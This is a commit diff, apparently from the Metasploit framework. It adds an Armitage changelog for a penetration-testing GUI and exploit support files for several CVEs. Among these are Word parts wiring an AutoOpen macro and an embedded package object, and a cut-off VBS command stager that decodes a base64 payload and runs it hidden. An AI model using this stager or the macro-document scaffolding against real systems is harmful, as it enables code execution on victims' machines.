+- And... the Armitage console now displays pretty colors. If you don't
+  like colors, set the console.show_colors.boolean preference to false
+  through Armitage -> Preferences.
+- Fixed a bug preventing input field from getting focus when popping a
+  console tab using Ctrl+W.
+
+14 May 12
+---------
+- Oopserific--dynamic workspace shortcuts were not bound until you
+  clicked the Workspaces menu. I fixed that.
+- Improved console pool's ability to detect a dead console. If you saw
+  "null" prompts in an open tab, it's because of a dead console. Fixed
+- Bound Ctrl+Backspace to reset dynamic workspaces. Ctrl+0 is now back
+  to what it originally did (resetting the font size to default).
+- Added Ctrl+T to take a screenshot of the active tab
+- Added Ctrl+W to pop the active tab into its own window
+- Armitage team server is now SSL enabled. The teamserver script (you
+  are using it, right?) generates a certificate for you using keytool.
+  The server presents the SHA1 hash of its certificate. Armitage users
+  have the opportunity to verify and trust the hash of the certificate
+  presented to them or to reject it and not connect.
+- Added Ctrl+Left / Ctrl+Right to quickly navigate through tabs.
+- Added a check to prevent clients from connecting to msfrpcd directly
+  when teaming is enabled.
+- Fixed a bug that prevented command shells from opening on some sessions
+- Team server client now caches certain calls to RPC server.
+- Reworked the Loot/Downloads View button. Now, all highlighted files are
+  displayed in one View tab. This makes searching easier. Each file is
+  displayed with a colored header (to make it easier to tell when one file
+  ends and the other begins). 
+- Added Sync Files button to Loot/Downloads tabs when connected to a team
+  server. This button will download all files associated with the highlighted
+  rows and save them in the Armitage data directory.
+
+7 May 12
+--------
+Note: Armitage team server setup has changed. Refer to the manual for
+the latest information: http://www.fastandeasyhacking.com/manual#7
+
+- Armitage team mode now routes all Metasploit-bound calls through the
+  deconfliction server. Armitage also pools "temporary" Metasploit
+  consoles. It's too bad this is logged as one change, because it's 
+  more like twenty. These changes were motivated by a desire to avoid 
+  triggering a race condition that was introduced w/ Metasploit 4.3.0.
+         http://dev.metasploit.com/redmine/issues/6829
+
+  On the bright side these changes will allow a lot more flexibility 
+  to optimize how Armitage interacts with msfrpcd and to do some neat 
+  things (like logging) in a centralized way.
+- Module description (in module launch dialog) is now resizable.
+- Added Ctrl+D keyboard shortcut to close active tab.
+- Armitage now uses (more robust) console queue for launching post
+  modules, handlers, brute force attacks, and other things.
+- Fixed a race condition in the Jobs tab refresh after killing a job
+- Armitage now filters smb hashes from non-psexec/smb login dialogs.
+- Added armitage.log_data_here.folder setting. This setting lets you
+  specify where Armitage will save its logs, downloaded files, and
+  screenshots. *cough* Some penetration testers like to dump everything
+  to an encrypted volume. *cough*. I apologize it took this long to
+  get this feature in place.
+- Improved perceived responsiveness of a console interaction
+
+17 Apr 12
+---------
+- Modified how Armitage determines a console command is complete to stay 
+  compat with behavior changes in a recent Metasploit update.
+- Armitage now queues console commands to prevent out of order execution.
+
+16 Apr 12
+---------
+- The search field in the module browser now updates results in real time.
+  Start typing and Armitage will start filtering the module tree for you. 
+  Clear the field to reset it to the default state.
+- Added keyboard shortcuts to switch dynamic workspaces...
+	Ctrl+1 = first workspace
+	Ctrl+2 = second workspace
+	....
+	Ctrl+0 = show all 
+- Added keyboard shortcuts:
+	Ctrl+N = new console
+	Ctrl+O = open preferences
+- Armitage's Meterpreter -> Access -> Dump Hashes -> lsass method is now 
+  much better about grabbing all of the hashdump output and adding it to 
+  the creds table. The hashdump command returns output as an arbitrary
+  number of chunks. I now use a different read strategy for determining when
+  the output is complete.
+- You may now use Ctrl+Alt to deselect highlighted items in a range in the
+  Jobs and Workspaces table views (most other table views that do multi
+  selection should allow this already).
+- Added Shell -> Pass Session for *NIX shell sessions. Uses the system_session
+  module to pass a shell session elsewhere (or duplicate the current shell)
+
+29 Mar 12
+---------
+- Fixed a bug that affects first-time users. Armitage was not initializing a
+  console before trying to connect to the database. 
+
+28 Mar 12
+---------
+- Team server now delivers chat messages in batches vs. one line at a time. 
+  This will make syncing on reconnect much better (in theory)
+- Several optimizations to prevent unnecessary reads/calls to deconfliction
+  server when in team mode. This will primarily affect high latency situations.
+- Use Shift+Click to close all tabs with the same name. This feature now closes
+  all tabs in the same group (e.g., all screenshots, file browsers, command 
+  shells, etc.)
+- Armitage now logs launches of the enum_dns module.
+- Hosts -> DNS Enumerate now populates NS field with highlighted host.
+- Armitage now adds a tooltip to tabs associated with a session. Hover your 
+  mouse over a tab X button to see which host the tab is associated with.
+- Fixed a potential exception caused when listing downloads.
+- Created a queue to process certain commands meant for Metasploit in order and
+  in a throttled manner. Started moving some Armitage calls to it. Now you can
+  fire an exploit at 1,000 hosts and Armitage won't blink. It might take awhile
+  before that exploit finishes firing against all of the hosts though :)
+- The file browser now has a "List Drives" button. It's only available on 
+  Windows sessions. Click it to see which drives are available.
+- File browser can now navigate to folders with apostrophes in their name.
+- Made some major internal changes to how Armitage interacts with Metasploit. The
+  goal is to make a more robust and faster hacking experience for you.
+
+22 Mar 12
+---------
+- Updated Armitage NMap profiles with the following:
+	-T4 (instead of -T5) [wait longer for open services to reply]
+	-n  [forces NMap to not resolve the hostname of IP addresses]
+	--min-hostgroup 96 [allows more parallelism when scanning hosts]
+- Armitage now intercepts screenshot and webcam_snap commands from meterpreter 
+  shell and performs the appropriate action with them.
+- View -> Creds -> Export button now works in team mode.
+- Doh! Armitage now properly shows VMWare icon when OS is set to a VMWare ESXi
+- Armitage "is command finished?" heuristic now accounts for commands like
+  del /S which prompt with a (Y/N)? - you can safely use these commands again.
+- Armitage now detects whether a client connecting to the team server is out 
+  dated or not. It rejects old clients. They will get a message indicating they
+  need to update and then their client won't do anything else. You'll see a
+  message printed to STDOUT where the team server ran about the rejection.
+- Added a * indicator to the active workspace in the workspaces menu.
+- Added Hosts -> DNS Enumerate, this menu launches a Metasploit module that will
+  attempt to discover hosts by querying a name server in different ways.
+- Added a file chooser helper to WORDLIST option.
+- Armitage now displays a pivot relationship between a compromised host and the
+  NAT/proxy device it is connected through.
+- Added a Copy button to services tab. This button copies the highlighted hosts
+  to the clipboard. I found myself needing this several times recently.
+- Improved reverse payload selection logic (now it includes rev php meterpreter)
+- Armitage now sets a different LPORT for each exploit launched with a rev payload
+
+10:30am
+- Changed algorithm for determining which edges to highlight in graph view. If there
+  is a pivot and both sides have a session, then the edge is highlighted.
+
+8 Mar 12 1.43-dev
+--------
+- Armitage now uses session_host to determine which host a session is associated
+  with. This value is grabbed directly from the OS itself. You'll no longer have
+  20 meterpreter sessions associated with a NAT/firewall device.
+- Armitage now spins up a new listener for each client-side attack (no longer
+  relying on the random default listener created on startup). Of course you can
+  change this... double-click the PAYLOAD option to set it to something else.
+- Token stealing dialog now disables refresh button while grabbing tokens. Enables
+  it again when done.
+- Armitage now talks to Metasploit every two minutes to prevent auth timeout.
+- Armitage now displays a firewall icon for hosts with no OS marked as a firewall
+  by MSF.
+- Armitage now selects an IPv6 bind payload when attacking IPv6 hosts.
+- Armitage now explicitly sets RPORT for different MSF Scan options and psexec.
+- Updated the about dialog to include a version number and release date.
+- Added a ./teamserver [external IP] [shared pass] script to the UNIX distro of 
+  Armitage. This script makes it much easier to startup Armitage's team server mode.
+
+2 Mar 12 - Catching up to a few MSF 4.3.0-dev changes...
+--------
+- Added a tab rename feature.
+- Hosts that self report as .NET server now display an XP/2003 era icon.
+- Updated route command parser to conform to Metasploit 4.3.0's output for it
+- "Check all credentials" feature now works when running the deconfliction 
+  server AND client from the same folder.
+- [host] -> Host -> Operating System -> * now clears notes related to host
+  before updating OS. This allows future scans to trigger MSF normalization
+  code and update the OS to something else (e.g., from Unknown to X)
+
+29 Feb 12
+---------
+- Armitage now displays a VMWare icon for hosts flagged as ESX/ESXi servers
+- Overhauled token stealing user experience--this is the cadillac version. You
+  now get a nice list of the available tokens (from the post module), click to
+  impersonate, refresh, rev2self, and getuid. 
+- Improved file browser responsiveness
+- Table view now allows individual hosts to be deselected in an interveral 
+  (Armitage will no longer reselect these hosts for you)
+- Dynamic workspaces no longer requires a comma and a space between entries (a
+  comma is good enough)
+- Improved the [Host] -> Remove menu option
+- Deconfliction server now returns the previous 100 events to new clients.
+- File browser directory up button is now more obvious
+- Keyboard accelerators when you right-click in the graph view are now correct.
+- Adjusted the graph view scrolling increments to something sane.
+- Added a slight delay between commands issued to a console to prevent them 
+  from executing out of order.
+
+21 Feb 12
+---------
+- Added Cut/Copy/Paste menu to table cell editor.
+- Module browser search field now treats spaces as a wildcard. You may type:
+  "win meterp" and Armitage will treat it as "win*meterp"
+- Hovering over an edge in graph view no longer reports a "null" tooltip
+- Fixed parsing of ps output for the process dialog (it's much much better now)
+
+14 Feb 12
+---------
+- Added ports 5631 (pc anywhere) and 902 (vmauthd) to the MSF Scans feature.
+- Several cosmetic tweaks to the spacing in Armitage tables.
+- Moved table render code from Sleep to Java to avoid potential lock conflicts
+- Added support for vba-exe payload output type.
+- Payload generation dialog now sets more appropriate default options for the
+  vba output type when it is selected.
+- Meterp command shell "read more stuff?" heuristic now accounts for Yes/No/All
+- Fixed ExitOnSession showing up twice when setting advanced options for a 
+  client-side exploit
+- You may now import multiple files through Hosts -> Import again.
+- Added 5s timeout to d-server connect attempt.
+- Added a --client [connect.properties] to specify which Metasploit server to 
+  connect to. The connect.properties file is a Java properties file that looks
+  like this (without the leading whitespace):
+
+  host=127.0.0.1
+  port=55553
+  user=msf
+  pass=test
+
+19 Jan 12
+---------
+- Data export now includes a sessions file. This lists all of the Metasploit
+  sessions you had in your database. There's some neat data here including
+  which exploit was used, which payload, start time, and close time. You can
+  calculate how much time you spent on your client's boxes. Cool stuff.
+- Fixed a potential dead-lock caused by mouse enter/exit events firing code
+  that required a lock. Nice landmine to defuse.
+- Fixed a weird condition with d-server detection. Sometimes (rarely)
+  Armitage wouldn't detect the d-server even when it's present.
+- Added check to d-server allowing one lock per/client. Client won't reobtain
+  a lock until it lets it go. This prevents you from opening two shell tabs
+  for a shell session in team mode.
+- Fixed an infinite loop condition when some Windows shell commands would
+  return output with no newlines (e.g., net stop [some service]). Thanks
+  Jesse for pointing me to this one.
+- Data export now includes a timeline file. This file documents all of the
+  major engagement events seen by Armitage. Included with each of these 
+  events is the source ip of the attack system and the user who carried out
+  the action (when teaming is setup).
+- Data export now exports timestamps with current timezone (not GMT)
+- Fixed a nasty bug that's been with Armitage since the beginning! I wasn't
+  freeing edges properly in the graph view. If you had pivots setup in graph
+  view and used Armitage long enough--eventually Armitage would slow down until 
+  the program became unusable. At least it's fixed now.
+- Adjusted the d-server state identity hash combination algorithm to better
+  avoid collissions.
+- Armitage now displays 'shell session' below a host if the host info is just
+  the Windows shell banner.
+
 5 Jan 12
 --------
 - Armitage d-server now transmits hosts, service, and session state only 

data/exploits/CVE-2008-6508/changelog.html

@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin changelog</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add changelog content here
+</p>
+</body>
+</html>

data/exploits/CVE-2008-6508/plugin.xml

@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<plugin>
+   <class>com.example.openfire.plugin.Example</class>
+   <name>PLUGINNAME</name>
+   <description>PLUGINDESCRIPTION</description>
+   <author>PLUGINAUTHOR</author>
+   <version>1.0.0</version>
+   <date>7/7/2008</date>
+   <minServerVersion>3.5.0</minServerVersion>
+</plugin>

data/exploits/CVE-2008-6508/readme.html

@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin readme</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add readme content here
+</p>
+</body>
+</html>

data/exploits/CVE-2010-0842/META-INF/MANIFEST.MF

@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+Created-By: 1.6.0_18 (Sun Microsystems Inc.)
+

data/exploits/CVE-2010-0842/META-INF/services/javax.sound.midi.spi.MidiDeviceProvider

@@ -0,0 +1,2 @@
+# Providers for midi devices
+com.sun.media.sound.MixerSequencerProvider

data/exploits/CVE-2012-0013/[Content_Types].xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="emf" ContentType="image/x-emf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/stylesWithEffects.xml" ContentType="application/vnd.ms-word.stylesWithEffects+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

data/exploits/CVE-2012-0013/_rels/__rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

data/exploits/CVE-2012-0013/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>1</TotalTime><Pages>1</Pages><Words>2</Words><Characters>13</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>14</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>

data/exploits/CVE-2012-0013/docProps/core.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>Windows User</dc:creator><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>2</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-07T21:43:00Z</dcterms:modified></cp:coreProperties>

data/exploits/CVE-2012-0013/word/_rels/document.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/></Relationships>

data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>

data/exploits/CVE-2012-0013/word/document.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p w:rsidR="00EB5F66" w:rsidRDefault="006042EE"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:r><w:rPr><w:noProof/></w:rPr><w:pict><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:80.2pt;height:40.5pt;z-index:-251657216;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text"><v:imagedata r:id="rId6" o:title=""/></v:shape><o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/></w:pict></w:r><w:bookmarkEnd w:id="0"/><w:r><w:t>W00TW00T</w:t></w:r></w:p><w:sectPr w:rsidR="00EB5F66"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

data/exploits/CVE-2012-0013/word/fontTable.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>

data/exploits/CVE-2012-0013/word/settings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="002B771F"/><w:rsid w:val="002B771F"/><w:rsid w:val="006042EE"/><w:rsid w:val="00EB5F66"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1027"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>

data/exploits/CVE-2012-0013/word/vbaData.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

data/exploits/CVE-2012-0013/word/webSettings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:optimizeForBrowser/><w:allowPNG/></w:webSettings>

data/exploits/batik_svg/META-INF/MANIFEST.MF

@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+SVG-Handler-Class: Exploit
+

data/exploits/cmdstager/vbs_b64_sleep

@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
